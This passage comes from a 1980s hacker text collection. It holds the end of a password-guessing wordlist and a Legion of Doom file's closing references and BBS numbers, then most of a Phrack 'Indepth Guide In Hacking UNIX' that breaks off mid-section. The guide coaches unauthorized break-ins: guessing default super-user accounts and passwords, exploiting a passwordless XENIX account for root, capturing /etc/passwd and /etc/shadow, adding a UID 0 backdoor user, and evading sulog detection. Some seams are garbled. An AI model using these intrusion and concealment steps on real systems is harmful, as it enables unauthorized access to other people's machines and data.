  1347.       badass             enzyme             marvin             simon
  1348.       bailey             euclid             master             simple
  1349.       banana             evelyn             maurice            singer
  1350.       bandit             extension          merlin             single
  1351.       banks              fairway            mets               smile
  1352.       bass               felicia            michael            smiles
  1353.       batman             fender             michelle           smooch
  1354.       beauty             fermat             mike               smother
  1355.       beaver             finite             minimum            snatch
  1356.       beethoven          flower             minsky             snoopy
  1357.       beloved            foolproof          mogul              soap
  1358.       benz               football           moose              socrates
  1359.       beowulf            format             mozart             spit
  1360.       berkeley           forsythe           nancy              spring
  1361.       berlin             fourier            napoleon           subway
  1362.       beta               fred               network            success
  1363.       beverly            friend             newton             summer
  1364.       angerine
  1365.       bumbling           george             osiris             tape
  1366.       cardinal           gertrude           outlaw             target
  1367.       carmen             gibson             oxford             taylor
  1368.       carolina           ginger             pacific            telephone
  1369.       caroline           gnu                painless           temptation
  1370.       castle             golf               pam                tiger
  1371.       cat                golfer             paper              toggle
  1372.       celtics            gorgeous           password           tomato
  1373.       change             graham             pat                toyota
  1374.       charles            gryphon            patricia           trivial
  1375.       charming           guest              penguin            unhappy
  1376.       charon             guitar             pete               unicorn
  1377.       chester            hacker             peter              unknown
  1378.       cigar              harmony            philip             urchin
  1379.       classic            harold             phoenix            utility
  1380.       coffee             harvey             pierre             vicky
  1381.       coke               heinlein           pizza              virginia
  1382.       collins            hello              plover             warren
  1383.       comrade            help               polynomial         water
  1384.       computer           herbert            praise             weenie
  1385.       condo              honey              prelude            whatnot
  1386.       condom             horse              prince             whitney
  1387.       cookie             imperial           protect            will
  1388.       cooper             include            pumpkin            william
  1389.       create             ingres             puppet             willie
  1390.       creation           innocuous          rabbit             winston
  1391.  
  1392. I hope this file has been of some help in getting started.  If you're asking
  1393. yourself the question 'Why hack?', then you've probably wasted a lot of time
  1394. reading this, as you'll never understand.  For those of you who have read this
  1395. and found it useful, please send a tax-deductible donation
  1396. of $5.00 (or more!) in the name of the Legion of Doom to:
  1397.  
  1398.                                        The American Cancer Society
  1399.                                        90 Park Avenue
  1400.                                        New York, NY  10016
  1401.  
  1402.  
  1403. *******************************************************************************
  1404.  
  1405. References:
  1406.  
  1407. 1) Introduction to ItaPAC by Blade Runner
  1408.    Telecom Security Bulletin 1
  1409.  
  1410. 2) The IBM VM/CMS Operating System by Lex Luthor
  1411.    The LOD/H Technical Journal 2
  1412.  
  1413. 3) Hacking the IRIS Operating System by The Leftist
  1414.    The LOD/H Technical Journal 3
  1415.  
  1416. 4) Hacking CDC's Cyber by Phrozen Ghost
  1417.    Phrack Inc. Newsletter 18
  1418.  
  1419. 5) USENET comp.risks digest (various authors, various issues)
  1420.  
  1421. 6) USENET unix.wizards forum (various authors)
  1422.  
  1423. 7) USENET info-vax forum (various authors)
  1424.  
  1425. Recommended Reading:
  1426.  
  1427. 1) Hackers by Steven Levy
  1428. 2) Out of the Inner Circle by Bill Landreth
  1429. 3) Turing's Man by J. David Bolter
  1430. 4) Soul of a New Machine by Tracy Kidder
  1431. 5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all by
  1432.    William Gibson
  1433. 6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,
  1434.    California, 94704, 415-995-2606
  1435. 7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can
  1436.    find.
  1437.  
  1438. Acknowledgements:
  1439.    Thanks to my wife for putting up with me.
  1440.    Thanks to Lone Wolf for the RSTS & TOPS assistance.
  1441.    Thanks to Android Pope for proofreading, suggestions, and beer.
  1442.    Thanks to The Urvile/Necron 99 for proofreading & Cyber info.
  1443.    Thanks to Eric Bloodaxe for wading through all the trash.
  1444.    Thanks to the users of Phoenix Project for their contributions.
  1445.    Thanks to Altos Computer Systems, Munich, for the chat system.
  1446.    Thanks to the various security personel who were willing to talk to me about
  1447.              how they operate.
  1448.  
  1449. Boards:
  1450.  
  1451.    I can be reached on the following systems with some regularity;
  1452.  
  1453.        The Phoenix Project:    512/441-3088    300-2400 baud
  1454.        Hacker's Den-80:        718/358-9209    300-1200 baud
  1455.        Smash Palace South:     512/478-6747    300-2400 baud
  1456.        Smash Palace North:     612/633-0509    300-2400 baud
  1457.  
  1458. ************************************* EOF *************************************
  1459. =========================================================================
  1460.  
  1461.                                 ==Phrack Inc.==
  1462.  
  1463.                       Volume Two, Issue 22, File 5 of 12
  1464.  
  1465.          /|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|
  1466.          |/                                                      |/
  1467.          /|           An Indepth Guide In Hacking UNIX           /|
  1468.          |/                          and                         |/
  1469.          /|        The Concept Of Basic Networking Utility       /|
  1470.          |/                                                      |/
  1471.          /|                     By Red Knight                    /|
  1472.          |/                                                      |/
  1473.          /|                     Member of the                    /|
  1474.          |/         Phreakers/Hackers Underground Network        |/
  1475.          /|                                                      /|
  1476.          |/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/|/
  1477.  
  1478. Brief History On UNIX
  1479. ~~~~~~~~~~~~~~~~~~~~~
  1480. Its because of Ken Tompson that today we are able to hack Unix.  He used to
  1481. work for Bell Labs in the 1960s.  Tompson started out using the MULTICS OS
  1482. which was later eliminated and Tompson was left without an operating system to
  1483. work with.
  1484.  
  1485. Tompson had to come up with something real quick. He did some research and and
  1486. in 1969 UNIX came out, which was a single user and it did not have many
  1487. capabilities.  A combined effort with others enabled him to rewrite the version
  1488. in C and add some good features.  This version was released in 1973 and was
  1489. made available to the public.  This was the first begining of UNIX in its
  1490. presently known form.  The more refined version of UNIX, today know as UNIX
  1491. system V developed by Berkley University has unique capabilities.
  1492.  
  1493. Various types of UNIXes are CPIX, Berkeley Ver 4.1, Berkeley 4.2, FOS, Genix,
  1494. HP-UX, IS/I, OSx, PC-IX, PERPOS, Sys3, Ultrix, Zeus, Xenix, UNITY, VENIX, UTS,
  1495. Unisys, Unip lus+, UNOS, Idris, QNIX, Coherent, Cromix, System III, System 7,
  1496. Sixth edition.
  1497.  
  1498. The Article Itself
  1499. ~~~~~~~~~~~~~~~~~~
  1500. I believe that hacking into any system requires knowledge of the operating
  1501. system itself.  Basically what I will try to do is make you more familiar with
  1502. UNIX operation and its useful commands that will be advantageous to you as a
  1503. hacker.  This article contains indepth explainations.  I have used the  UNIX
  1504. System V to write this article.
  1505.  
  1506.  
  1507. Error Messages:  (UNIX System V)
  1508. ~~~~~~~~~~~~~~
  1509. Login Incorrect - An invalid ID and/or password was entered.  This means
  1510.                   nothing.  In UNIX there is no way guessing valid user IDs.
  1511.                   You may come across this one when trying to get in.
  1512.  
  1513. No More Logins  - This happens when the system will not accept anymore logins.
  1514.                   The system could be going down.
  1515.  
  1516. Unknown Id      - This happens if an invalid id is entered using (su) command.
  1517.  
  1518. Unexpected Eof In File - The file being stripped or the file has been damaged.
  1519.  
  1520. Your Password Has Expired - This is quite rare although there are situations
  1521.                             where it can happen.  Reading the etc/passwd will
  1522.                             show you at how many intervals it changes.
  1523.  
  1524. You May Not Change The Password - The password has not yet aged enough.  The
  1525.                                   administrator set the quotas for the users.
  1526.  
  1527. Unknown Group (Group's Name) - Occurs when chgrp is executed, group does not
  1528.                                exist.
  1529. Sorry - Indicated that you have typed in an invalid super user password
  1530.         (execution of the su).
  1531.  
  1532. Permission Denied! - Indicated you must be the owner or a super user to change
  1533.                      password.
  1534.  
  1535. Sorry <( Of Weeks) Since Last Change - This will happen when password has has
  1536.                                         not aged enough and you tried to change
  1537.                                         it (password).
  1538.  
  1539. (Directory Name):  No Permission - You are trying to remove a directory which
  1540.                                    you have no permission to.
  1541.  
  1542. (File Name) Not Removed - Trying to delete a file owned by another user that
  1543.                           you do not have write permission for.
  1544.  
  1545. (Dirname) Not Removed - Ownership of the dir is not your that your trying to
  1546.                         delete.
  1547.  
  1548. (Dirname) Not Empty - The directory contains files so you must have to delete
  1549.                       the files before execcant open [file name] - defined
  1550.                       wrong path, file name or you have no read permission.
  1551.  
  1552. Cp:  (File Name) And (File Name) Are Identical - Self explanatory.
  1553.  
  1554. Cannot Locate Parent Directory - Occurs when using mv.
  1555.  
  1556. (File name) Not Found - File which your trying to move does not exist.
  1557.  
  1558. You Have Mail - Self explanatory.
  1559.  
  1560.  
  1561. Basic Networking Utility Error Messages
  1562. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1563. Cu:  Not found         - Networking not installed.
  1564. Login Failed           - Invalid id/pw or wrong number specified.
  1565. Dial Failed            - The systen never answered due to a wrong number.
  1566. UUCP Completely Failed - Did not specify file after -s.
  1567. Wrong Time to Call     - You called at the time at a time not specified in the
  1568.                          Systems file.
  1569. System not in systems  - You called a remote not in the systems file.
  1570.  
  1571.  
  1572. Logon Format
  1573. ~~~~~~~~~~~~
  1574. The first thing you must do is switch to lower case.  To identifing a UNIX,
  1575. this is what you will see;
  1576.  
  1577. AT&T Unix System V 3.0 (eg of a system identifier)
  1578.  
  1579. login:
  1580.  or
  1581. Login:
  1582.  
  1583. Any of these is a UNIX.  Here is where you will have to guess at a user valid
  1584. id.  Here are some that I have come across; glr, glt, radgo, rml, chester, cat,
  1585. lom, cora, hlto, hwill, edcasey, and also some containing numbers; smith1,
  1586. mitu6, or special characters in it; bremer$, jfox.  Login names have to be 3
  1587. to 8 chracters in length, lowercase, and must start with a letter.  In some
  1588. XENIX systems one may login as "guest"
  1589.  
  1590. User Level Accounts (Lower Case)
  1591. ~~~~~~~~~~~~~~~~~~~
  1592. In Unix there are what is called.  These accounts can be used at the "login:"
  1593. prompt.  Here is a list:
  1594.  
  1595. sys      bin     trouble      daemon     uucp     nuucp      rje     lp     adm
  1596.  
  1597.  
  1598. Super-User Accounts
  1599. ~~~~~~~~~~~~~~~~~~~
  1600. There is also a super-user login which make UNIX worth hacking.  The accounts
  1601. are used for a specific job.  In large systems these logins are assingned to
  1602. users who have a responsibilty to maintain subsystems.
  1603.  
  1604. They are as follows (all lower case);
  1605.  
  1606. root       -  This is a must the system comes configured with it. It has no
  1607.               restriction.  It has power over every other account.
  1608. unmountsys -  Unmounts files
  1609. setup      -  System set up
  1610. makefsys   -  Makes a new file
  1611. sysadm     -  Allows useful S.A commands (doesn't need root login)
  1612. powerdown  -  Powering system down
  1613. mountfsys  -  Mounts files
  1614. checkfsys  -  Checks file
  1615.  
  1616. These accounts will definitly have passwords assigned to them.  These accounts
  1617. are also commands used by the system administrator.  After the login prompt you
  1618. will receive a password prompt:
  1619.  
  1620. password:
  1621.   or
  1622. Password:
  1623.  
  1624. Enter the password (it will not echo).  The password rule is as follows; Each
  1625. password has to contain at least 6 characters and maximum of 8 characters.  Two
  1626. of which are to be alphabetic letters and at least one being a number or a
  1627. special character.  The alphabetic digits could be in upper case or lower
  1628. case.  Here are some of the passwords that I have seen; Ansuya1, PLAT00N6,
  1629. uFo/78, ShAsHi.., Div417co.
  1630.  
  1631. The passwords for the super user accounts will be difficult to hack try the
  1632. accounts interchangebly; login:sysadm password:makefsys, or rje1, sysop,
  1633. sysop1, bin4, or they might contain letters, numbers, or special chracters in
  1634. them.  It could be anything.  The user passwords are changed by an aging
  1635. proccess at successive intervals.  The users are forced to changed it.  The
  1636. super-user will pick a password that will not need changing for a long period
  1637. of time.
  1638.  
  1639.  
  1640. You Have Made It!
  1641. ~~~~~~~~~~~~~~~~~
  1642. The hard part is over and hopefully you have hacked a super-user account.
  1643. Remember Control-d stops a process and also logs you off.  The next thing you
  1644. will probably see is the system news.  Ex;
  1645.  
  1646. login:john
  1647. password:hacker1
  1648.  
  1649. System news
  1650.  
  1651. There will be no networking offered to the users till
  1652. August 15, due to hardware problems.
  1653. (Just An Example)
  1654.  
  1655. $
  1656.  
  1657. $ (this is the Unix prompt) - Waiting for a command to be entered.
  1658.  - Means your logged in as root (Very Good).
  1659.  
  1660. A Word About The XENIX System III (Run On The Tandy 6000)
  1661. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1662. The largest weakness in the XENIX System III occurs after the installation
  1663. of the Profile-16 or more commonly know as the Filepro-16.  I have seen the
  1664. Filepro-16 installed in many systems.  The installation process creates an
  1665. entry in the password file for a user named \fBprofile\fR, an account that who
  1666. owns and administors the database.  The great thing about it is that when the
  1667. account is created, no password is assigned to it.  The database contains
  1668. executable to maintain it.  The database creation programs perform a
  1669. \fBsetuid\fR to boot up the \fBoot\fR  thereby giving a person the whole C
  1670. Shell to gain Super User privilege same as root.  Intresting huh!
  1671.  
  1672. (* Note:  First the article will inform you of how the Unix is made up.)
  1673.  
  1674.  
  1675. The Unix is made if three components - The Shell, The Kernal, File System.
  1676.  
  1677. The Kernal
  1678. ~~~~~~~~~~
  1679. You could say that the kernal is the heart of the Unix operating system. The
  1680. kernal is a low level language lower than the shell which maintains processes.
  1681. The kernal handles memory usage, maintains file system the sofware and hardware
  1682. devices.
  1683.  
  1684. The Shell
  1685. ~~~~~~~~~
  1686. The shell a higher level language.  The shell had two important uses, to act as
  1687. command interpreture for example using commands like cat or who.  The shell is
  1688. at work figuring out whether you have entered a command correctly or not.  The
  1689. second most important reason for the shell is its ability to be used as
  1690. programing language.  Suppose your performing some tasks repeatedly over and
  1691. over again, you can program the shell to do this for you.
  1692.  
  1693.             (Note:  This article will not cover shell programming.)
  1694.             (       Instead B.N.N will be covered.                )
  1695.  
  1696.  
  1697. The File System
  1698. ~~~~~~~~~~~~~~~
  1699. The file system in Unix is divided into 3 catagories:  Directories, ordinary
  1700. files and special files (d,-).
  1701.  
  1702. Basic Stucture:
  1703.  
  1704. (/)-this is abreviation for the root dirctory.
  1705.  
  1706.   root level                      root
  1707.                                   (/)                                  system
  1708. -------------------------------------|---------------------------------- level
  1709. |      |        |         |                  |        |       |        |
  1710. /unix  /etc     /dev      /tmp               /lib     /usr    /usr2    /bin
  1711.        |                                         _____|_____
  1712. login passwd                                     |    |    |
  1713. level                                            /john  /cathy
  1714.                               ________________________|_______________
  1715.                              |        |     |      |        |        |
  1716.                          .profile   /mail  /pers  /games   /bin     /michelle
  1717. *.profile - in case you                    |    __|______  |      __|_______
  1718. wish to change your environment, but    capital |        | data   | |       |
  1719. after you log off, it sets it to              othello  starwars letter letter1
  1720. default.
  1721.  
  1722. /unix - This is the kernal.
  1723. /etc  - Contains system administrators files,Most are not available to the
  1724.         regular user (this dirrctory contains the /passwd file).
  1725.  
  1726.     Here are some files under /etc directory:
  1727.     /etc/passwd
  1728.     /etc/utmp
  1729.     /etc/adm/sulog
  1730.     /etc/motd
  1731.     /etc/group
  1732.     /etc/conf
  1733.     /etc/profile
  1734.  
  1735. /dev - contains files for physical devices such as printer and the disk drives
  1736. /tmp - temporary file directory
  1737. /lib - dirctory that contains programs for high level languages
  1738. /usr - this directory contains dirctories for each user on the system
  1739. /bin - contain executable programs (commands)
  1740.  
  1741. The root also contains:
  1742. /bck - used to mount a back up file system.
  1743. /install - Used to install and remove utilities
  1744. /lost+found - This is where all the removed files go, this dir is used by fsck
  1745. /save -A utility used to save data
  1746. /mnt - Used for temporary mounting
  1747.  
  1748. **Now the fun part scouting around**
  1749.  
  1750. Local Commands (Explained In Details)
  1751. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1752. At the unix prompt type the pwd command.  It will show you the current working
  1753. directory you are in.
  1754.  
  1755. $ pwd
  1756. $ /usr/admin - assuming that you have hacked into a super user account
  1757.                check fsys
  1758. $
  1759.  
  1760. This gives you the full login directory.  The / before tell you the location of
  1761. the root directory.
  1762.  
  1763. Or
  1764.  
  1765. (REFER TO THE DIAGRAM ABOVE)
  1766. $ pwd
  1767. $ /usr/john
  1768. $
  1769. Assuming you have hacked into John's account.
  1770.  
  1771. Lets say you wanted to move down to the Michelle directory that contains
  1772. letters.  You would type in;
  1773.  
  1774. $ cd michelle or cd usr/john/michelle
  1775. $ pwd
  1776. $ /usr/john/michelle
  1777. $
  1778.  
  1779. Going back one directory up type in:
  1780. $ cd ..
  1781. or going to your parent directory just type in "cd"
  1782.  
  1783. Listing file directories assuming you have just logged in:
  1784. $ ls /usr/john
  1785. mail
  1786. pers
  1787. games
  1788. bin
  1789. michelle
  1790. This wont give you the .profile file.  To view it type
  1791. $ cd
  1792. $ ls -a
  1793. :
  1794. :
  1795. .profile
  1796.  
  1797. To list file names in Michelle's directory type in:
  1798. $ ls michelle (that if your in the johns directory)
  1799. $ ls /usr/john/michelle(parent dir)
  1800.  
  1801. ls -l
  1802. ~~~~~
  1803. The ls -l is an an important command in unix.This command displays the whole
  1804. directory in long format :Run this in parent directory.
  1805. $ ls -l
  1806. total 60
  1807. -rwxr-x---    5 john      bluebox    10 april 9  7:04  mail
  1808. drwx------    7 john      bluebox    30 april 2  4:09  pers
  1809.      :            :         :         :     :      :    :
  1810.      :            :         :         :     :      :    :
  1811. -rwxr-x---     6 cathy    bluebox    13 april 1  13:00 partys
  1812.      :            :         :         :     :      :    :
  1813. $
  1814.  
  1815. The total 60 tells one the ammount of disk space used in a directory.  The
  1816. -rwxr-x--- is read in triples of 3.  The first chracter eg (-, d, b, c) means
  1817. as follows:  - is an ordinary file, d is a directory, b is block file, c is a
  1818. character file.
  1819.  
  1820. The r stands for read permission, w is write permission, x is execute. The
  1821. first column is read in 3 triples as stated above.  The first group of 3 (in
  1822. -rwxr-x---) after the "-" specifies the permission for the owner of the file,
  1823. the second triple are for the groups (the fourth column) and the last triple
  1824. are the permissions for all other users.  Therefore, the -rwxr-x--- is read as
  1825. follows.
  1826.  
  1827. The owner, John, has permission to read, write, and execute anything in the bin
  1828. directory but the group has no write permission to it and the rest of the users
  1829. have no permission at all.  The format of one of the lines in the above output
  1830. is as follows:
  1831.  
  1832. file type-permissions, links, user's name, group, bytes taken, date, time when
  1833. last renued, directory, or file name.
  1834.  
  1835.                *** You will be able to read, execute Cathy's ***
  1836.                *** file named partly due to the same group.  ***
  1837.  
  1838. Chmod
  1839. ~~~~~
  1840. The chmod command changes permission of a directory or a file.  Format is
  1841. chmod who+, -, =r , w, x
  1842.  
  1843. The who is substituted by u-user, g-group, o-other users, a-all.
  1844. The + means add permission, - means remove permission, = - assign.
  1845. Example:  If you wanted all other users to read the file name mail, type:
  1846.  
  1847. $ chmod o+r mail
  1848.  
  1849. Cat
  1850. ~~~
  1851. Now suppose you wanted to read the file letter.  There are two ways to doing
  1852. this.  First go to the michelle directory then type in:
  1853.  
  1854. $ cat letter
  1855. line one ...\
  1856. line two ... }the output of letter
  1857. line three../
  1858. $
  1859.    or
  1860. If you are in the parent directory type in:
  1861. $ cat /usr/john/michelle/letter
  1862. and you will have the same output.
  1863.  
  1864. Some cat options are  -s, -u, -v, -e, -t
  1865.  
  1866. Special Chracters in Unix
  1867. ~~~~~~~~~~~~~~~~~~~~~~~~~
  1868. *      - Matches any number of single characters eg. ls john* will list all
  1869.          files that begin with john
  1870. [...]  - Matchs any one of the chracter in the [ ]
  1871. ?      - Matches any single chracter
  1872. &      - Runs a process in the backgroung leaving your terminal free
  1873. $      - Values used for variables also $n - null argument
  1874. >      - Redirectes output
  1875. <      - Redirects input to come from a file
  1876. >>     - Redirects command to be added to the end of a file
  1877. |      - Pipe output (eg:who|wc-l tells us how many users are online)
  1878. "..."  - Turn of meaning of special chracters excluding $,`
  1879. `...`  - Allows command output in to be used in a command line
  1880. '...'  - Turns of special meaning of all chracters
  1881.  
  1882. Continuation Of Local Commands
  1883. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1884. man [command] or [c/r] -will give you a list of commands explainations
  1885. help - available on some UNIX systems
  1886. mkdir [dir name(s)] - makes a directory
  1887. rmdir [dir name(s)] - removes directory.You wont be able to remove the
  1888.                       directory if it contains files in them
  1889. rm [file name(s)] - removes files. rm * will erase all files in the current
  1890.                     dir.  Be carefull you!  Some options are:
  1891.                     [-f unconditional removal] [-i Prompts user for y or n]
  1892.  
  1893. ps [-a all processes except group leaders] [-e all processes] [-f the whole
  1894.    list]  - This command reports processes you are running eg:
  1895.  
  1896.    $ps
  1897.    PID   TTY  TIME   COMMAND
  1898.    200   tty09 14:20  ps
  1899.  
  1900.    The systems reports (PID - process idenetification number which is a number
  1901.    from 1-30,000 assigned to UNIX processes)
  1902.    It also reports the TTY,TIME and the COMMAND being executed at the time.
  1903.    To stop a process enter :
  1904.  
  1905.    $kill [PID] (this case its 200)
  1906.    200 terminated
  1907.    $
  1908.  
  1909. grep (argument) - searches for an file that contains the argument
  1910. mv (file names(s)) ( dir name ) - renames a file or moves it to another
  1911.                                   directory
  1912. cp [file name] [file name] - makes a copy of a file
  1913. write [login name ] - to write to other logged in users.  Sort of a chat
  1914. mesg [-n] [-y] - doesn't allow others to send you messages using the write
  1915.                  command.  Wall used by system adm overrides it.
  1916. $ [file name] - to execute any file
  1917. wc [file name] - Counts words, characters,lines in a file
  1918. stty [modes] - Set terminal I/O for the current devices
  1919. sort [filename] - Sorts and merges files many options
  1920. spell [file name] > [file name] - The second file is where the misspelt words
  1921.                                   are entered
  1922. date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options
  1923. at [-r] [-l] [job] - Does a specified job at a specified time.  The -r Removes
  1924.                      all previously scheduled jobs.The -l reports the job  and
  1925.                      status of all jobs scheduled
  1926. write [login] [tty] - Sends message to the login name.  Chat!
  1927.  
  1928.  
  1929. Su [login name]
  1930. ~~~~~~~~~~~~~~~
  1931. The su command allows one to switch user to a super user to a user.  Very
  1932. important could be used to switch to super user accounts.
  1933. Usage:
  1934.  
  1935. $ su sysadm
  1936. password:
  1937.  
  1938. This su command will be monitored in /usr/adm/sulog and this file of all files
  1939. is carefully monitered by the system administrator.Suppose you hacked in john's
  1940. account and then switched to the sysadm account (ABOVE) your /usr/adm/su log
  1941. entry would look like:
  1942.  
  1943. SU  04/19/88  21:00 + tty 12 john-sysadm
  1944.  
  1945. Therfore the S.A(system administrator) would know that john swithed to sysadm
  1946. account on 4/19/88 at 21:00 hours
  1947.  
  1948.  
  1949. Searching For Valid Login Names:
  1950. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1951. Type in-
  1952. $ who  ( command informs the user of other users on the system)
  1953. cathy  tty1  april 19  2:30
  1954. john   tty2  april 19  2:19
  1955. dipal  tty3  april 19  2:31
  1956. :
  1957. :
  1958. tty is the user's terminal, date, time each logged on.  mary, dr.m are valid
  1959. logins.
  1960.  
  1961. Files worth concatenating(cat)
  1962.  
  1963.  
  1964. /etc/passwd file
  1965. ~~~~~~~~~~~~~~~~
  1966. The etc/passwd is a vital file to cat.  For it contains login names of all
  1967. users including super user accounts and there passwords.  In the newer SVR3
  1968. releases they are tighting their security by moving the encrypted passwords
  1969. from /etc/passwd to /etc/shadow making it only readable by root.
  1970. This is optional of course.
  1971.  
  1972. $ cat /etc/passwd
  1973. root:D943/sys34:0:1:0000:/:
  1974. sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
  1975. checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
  1976. :
  1977. other super user accs.
  1978. :
  1979. john:hacker1:34:3:john scezerend:/usr/john:
  1980. :
  1981. other users
  1982. :
  1983. $
  1984.  
  1985. If you have reached this far capture this file as soon as possible.  This is a
  1986. typical output etc/passwd file.  The entries are seperated by a ":".  There
  1987. made be up to 7 fields in each line.
  1988. Eg.sysadm account.
  1989.  
  1990. The first is the login name in this case sysadm.The second field contains the
  1991. password.  The third field contains the user id."0 is the root."  Then comes
  1992. the group id then the account which contains the user full name etc.  The sixth
  1993. field is the login directory defines the full path name of the the paticular
  1994. account and the last is the program to be executed.  Now one can switch to
  1995. other super user account using su command descibed above.  The password entry
  1996. in the field of the checkfsys account in the above example is "Locked;". This
  1997. doesn't mean thats its a password but the account checkfsys cannot be accessed
  1998. remotely.  The ";" acts as an unused encryption character.  A space is also
  1999. used for the same purpose.  You will find this in many UNIX systems that are
  2000. small systems where the system administrator handles all maintaince.
  2001.  
  2002. If the shawdowing is active the /etc/passwd would look like this:
  2003.  
  2004. root:x:0:1:0000:/:
  2005. sysadm:x:0:0:administration:/usr/admin:/bin/rsh
  2006.  
  2007. The password filed is substituted by "x".
  2008.  
  2009. The /etc/shawdow file only readable by root will look similar to this:
  2010.  
  2011. root:D943/sys34:5288::
  2012. :
  2013. super user accounts
  2014. :
  2015. Cathy:masai1:5055:7:120
  2016. :
  2017. all other users
  2018. :
  2019.  
  2020. The first field contains users id:  The second contains the password (The pw
  2021. will be NONE if logining in remotely is deactivated):  The third contains a
  2022. code of when the password was last changed:  The fourth and the fifth contains
  2023. the minimum and the maximum numbers of days for pw changes (its rare that you
  2024. will find this in the super user logins due to there hard to guess passwords)
  2025.  
  2026.  
  2027. /etc/options
  2028. ~~~~~~~~~~~~
  2029. The etc/options file informs one the utilities available in the system.
  2030. -rwxr-xr-x   1 root  sys   40 april  1:00  Basic Networking utility
  2031.  
  2032.  
  2033. /etc/group
  2034. ~~~~~~~~~~
  2035. The file has each group on the system.  Each line will have 4 entries separated
  2036. by a ":".   Example of concatenated /etc/group:
  2037.  
  2038. root::0:root
  2039. adm::2:adm,root
  2040. bluebox::70:
  2041.  
  2042. Group name:password:group id:login names
  2043. ** It very unlikely that groups will have passwords assigned to them **
  2044. The id "0" is assigned to /
  2045.  
  2046.  
  2047. Sending And Recieving Messages
  2048. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2049. Two programs are used to manage this.  They are mail & mailx.  The difference
  2050. between them is that mailx is more fancier thereby giving you many choices like
  2051. replying message, using editors, etc.
  2052.  
  2053.  
  2054. Sending
  2055. ~~~~~~~
  2056. The basic format for using this command is:
  2057.  
  2058. $mail [login(s)]
  2059. (now one would enter the text after finishing enter "." a period on the next
  2060. blank line)
  2061. $
  2062.  
  2063. This command is also used to send mail to remote systems.  Suppose you wanted
  2064. to send mail to john on a remote called ATT01 you would type in:
  2065.  
  2066. $mail ATT01!john
  2067.  
  2068. Mail can be sent to several users, just by entering more login name after
  2069. issuing the mail command
  2070.  
  2071. Using mailx is the same format:(This I'll describe very briefly) $mailx john
  2072. subject:(this lets you enter the subject)
  2073. (line 1)
  2074. (line 2)
  2075. (After you finish enter (~.) not the brackets of course, more commands are
  2076. available like ~p, ~r, ~v, ~m, ~h, ~b, etc.).
  2077.  
  2078.  
  2079. Receiving
  2080. ~~~~~~~~~
  2081. After you log on to the system you will the account may have mail waiting.
  2082. You will be notified "you have mail."
  2083. To read this enter:
  2084. $mail
  2085. (line 1)
  2086. (line 2)
  2087. (line 3)
  2088. ?
  2089. $
  2090.  
  2091. After the message you will be prompted with a question mark.  Here you have a
  2092. choice to delete it by entering d, saving it to view it later s, or just press
  2093. enter to view the next message.
  2094.  
  2095.               (DON'T BE A SAVANT AND DELETE THE POOR GUY'S MAIL)
  2096.  
  2097.  
  2098. Super User Commands
  2099. ~~~~~~~~~~~~~~~~~~~
  2100. $sysadm adduser - will take you through a routine to add a user (may not last
  2101.                   long)
  2102.  
  2103. Enter this:
  2104.  
  2105. $ sysadm adduser
  2106. password:
  2107. (this is what you will see)
  2108.  /--------------------------------------------------------------------------\
  2109.   Process running succommmand `adduser`
  2110.   USER MANAGMENT
  2111.  
  2112.   Anytime you want to quit, type "q".
  2113.   If you are not sure how to answer any prompt, type "?" for help
  2114.  
  2115.   If a default appears in the question, press <RETURN> for the default.
  2116.  
  2117.   Enter users full name [?,q]: (enter the name you want)
  2118.   Enter users login ID [?,q]:(the id you want to use)
  2119.   Enter users ID number (default 50000) [?,q) [?,q]:( press return )
  2120.   Enter group ID number or group name:(any name from /etc/group)
  2121.   Enter users login home directory:(enter /usr/name)
  2122.  
  2123.   This is the information for the new login:
  2124.   Users name: (name)
  2125.   login ID:(id)
  2126.   users ID:50000
  2127.   group ID or name:
  2128.   home directory:/usr/name
  2129.   Do you want to install, edit, skip [i, e, s, q]? (enter your choice if "i"
  2130.   then)
  2131.  Login installed
  2132.  Do you want to give the user a password?[y,n] (its better to enter one)
  2133.  New password:
  2134.  Re-enter password:
  2135.  
  2136.  Do you want to add another login?
  2137. \----------------------------------------------------------------------------/
  2138.  
  2139. This is the proccess to add a user.  Since you hacked into a super user account
  2140. you can make a super user account by doing the following by entering 0 as an
  2141. user and a group ID and enter the home directory as /usr/admin.  This will give
  2142. you as much access as the account sysadm.
  2143.  
  2144. **Caution** - Do not use login names like Hacker, Cracker,Phreak etc.  This is
  2145. a total give away.
  2146.  
  2147. The process of adding a user wont last very long the S.A will know when he
  2148. checks out the /etc/passwd file
  2149.  
  2150. $sysadm moduser - This utility allows one to modify users.  DO NOT ABUSE!!
  2151. !
  2152.  
  2153. Password:
  2154.  
  2155. This is what you'll see:
  2156.  
  2157. /----------------------------------------------------------------------------\
  2158. MODIFYING USER'S LOGIN
  2159.  
  2160. 1)chgloginid  (This is to change the login ID)
  2161. 2)chgpassword (Changing password)
  2162. 3)chgshell (Changing directory DEFAULT = /bin/sh)
  2163.  
  2164. ENTER A NUMBER,NAME,INITIAL PART OF OF NAME,OR ? OR <NUMBER>? FOR HELP, Q TO
  2165. QUIT ?
  2166. \----------------------------------------------------------------------------/
  2167.  
  2168. Try every one of them out.Do not change someones password.It creates a havoc.
  2169. If you do decide to change it.Please write the original one down somewhere
  2170. and change back.Try not to leave to many traces after you had your fun.  In
  2171. choice number 1 you will be asked for the login and then the new one.  In
  2172. choice number 2 you will asked for the login and then supplied by it correct
  2173. password and enter a new one.  In choice 3 this is used to a pchange the login
  2174. shell ** Use full **  The above utilites can be used separatly for eg (To
  2175. change a password one could enter: $sysadm chgpasswd not chapassword, The rest
  2176. are same)
  2177.  
  2178. $sysadm deluser - This is an obviously to delete a user password:
  2179.  
  2180. This will be the screen output:
  2181. /---------------------------------------------------------------------------\
  2182. Running subcommand 'deluser' from menu 'usermgmt'
  2183. USER MANAGEMENT
  2184.  
